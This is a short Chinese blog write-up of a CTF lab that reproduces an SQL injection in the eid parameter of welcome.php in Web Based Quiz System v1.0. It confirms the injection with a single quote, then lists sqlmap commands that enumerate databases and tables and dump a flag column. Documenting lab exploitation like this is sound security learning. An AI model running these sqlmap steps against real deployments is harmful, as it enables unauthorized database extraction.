一、靶场介绍

该CMS的welcome.php中存在SQL注入攻击。

Web Based Quiz System v1.0 通过welcome.php 中的eid 参数被发现包含一个SQL 注入漏洞。

二、复现过程

访问链接发现只有注册和登录两个功能

随意注册一个账号进行登录，登录后的界面如下

根据提示，受影响的文件为welcome.php，对该页面的功能和参数进行调试，在对参数eid输入”‘“时，发现报错，判断eid参数存在注入漏洞

抓包然后用sqlmap一把梭

1	`python sqlmap.py -r xxx.txt --batch`

1	`python sqlmap.py -r xxx.txt -p eid --dbs`

1	`python sqlmap.py -r xxx.txt -p eid -D ctf --tables`

1	`python sqlmap.py -r xxx.txt -p eid -D ctf -T flag -C flag --dump`

漏洞复现

本博客所有文章除特别声明外，均采用 CC BY-SA 4.0 协议，转载请注明出处！